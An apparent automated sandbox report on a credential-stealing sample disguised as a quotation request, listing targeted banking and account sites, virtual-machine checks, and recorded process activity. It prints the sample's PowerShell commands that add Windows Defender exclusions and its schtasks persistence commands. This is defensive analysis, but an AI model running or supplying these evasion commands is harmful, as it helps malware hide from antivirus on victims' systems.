                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3826220785.0000000000C99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllok
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: NuDUTBObHpKADz.exe, 0000000A.00000002.1468102089.0000000001162000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DE9548 LdrInitializeThunk,9_2_06DE9548
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeMemory written: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeProcess created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeProcess created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeQueries volume information: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeQueries volume information: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
